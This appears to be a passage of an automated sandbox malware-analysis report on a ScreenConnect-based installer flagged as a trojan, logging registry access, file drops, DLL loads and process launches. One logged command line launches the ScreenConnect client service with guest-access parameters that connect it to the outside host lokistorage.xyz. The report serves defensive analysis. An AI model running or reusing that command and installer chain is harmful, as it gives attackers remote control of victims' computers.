                              Source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: tmpzNIZ0YQ.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_058518D0 CreateProcessAsUserW,8_2_058518D0
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\418a03.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{BF3035CA-924F-7DEB-610F-14962D2B8EE2}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8E59.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9148.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI934C.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\418a05.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\418a05.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{BF3035CA-924F-7DEB-610F-14962D2B8EE2}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{BF3035CA-924F-7DEB-610F-14962D2B8EE2}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\qaw1ymml.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\qaw1ymml.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI9148.tmpJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeCode function: 0_2_05E09C900_2_05E09C90
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeCode function: 0_2_05E0EC530_2_05E0EC53
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeCode function: 0_2_05E0EE500_2_05E0EE50
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeCode function: 0_2_05E06AB80_2_05E06AB8
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeCode function: 0_2_05E060800_2_05E06080
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeCode function: 0_2_05E06AA80_2_05E06AA8
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeCode function: 0_2_05E6012B0_2_05E6012B
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_0151D4888_2_0151D488
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886A570989_2_00007FF886A57098
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886A574C89_2_00007FF886A574C8
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886D66DFB9_2_00007FF886D66DFB
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886D603F29_2_00007FF886D603F2
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886D65CB69_2_00007FF886D65CB6
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886A7709810_2_00007FF886A77098
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886A708F210_2_00007FF886A708F2
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886D824EC10_2_00007FF886D824EC
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886D8DC8610_2_00007FF886D8DC86
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886D8596610_2_00007FF886D85966
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886D8EA3210_2_00007FF886D8EA32
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886D861F710_2_00007FF886D861F7
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886D8590010_2_00007FF886D85900
                              Source: tmpzNIZ0YQ.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: tmpzNIZ0YQ.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: tmpzNIZ0YQ.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: tmpzNIZ0YQ.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: tmpzNIZ0YQ.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1418481996.00000000060AB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1417006147.0000000005BF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1417006147.0000000005BF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1417006147.0000000005BF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1410802943.0000000003650000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1410640850.00000000035C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exe, 00000000.00000002.1409997648.0000000001C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenamezlib.dll2 vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenamewixca.dll\ vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tmpzNIZ0YQ.exe
                              Source: tmpzNIZ0YQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.0.tmpzNIZ0YQ.exe.c363d4.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.2.tmpzNIZ0YQ.exe.35c0000.1.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal50.troj.evad.winEXE@17/65@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)Jump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmpzNIZ0YQ.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: tmpzNIZ0YQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: tmpzNIZ0YQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: tmpzNIZ0YQ.exeReversingLabs: Detection: 21%
                              Source: tmpzNIZ0YQ.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: tmpzNIZ0YQ.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeFile read: C:\Users\user\Desktop\tmpzNIZ0YQ.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\tmpzNIZ0YQ.exe "C:\Users\user\Desktop\tmpzNIZ0YQ.exe"
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A147D8F4A2A0D4F5C5A36F7D0C7BF249 C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 52881A0F31505AA001D51A2B2FDDE9ED
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4081353BA27C3192F1069208B3FE053F E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "6499763b-8fe0-474c-8e02-22f9c957ab00" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "f01c433b-e368-416e-a09f-c16bb2e654cf" "System"
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A147D8F4A2A0D4F5C5A36F7D0C7BF249 CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 52881A0F31505AA001D51A2B2FDDE9EDJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4081353BA27C3192F1069208B3FE053F E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "6499763b-8fe0-474c-8e02-22f9c957ab00" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "f01c433b-e368-416e-a09f-c16bb2e654cf" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
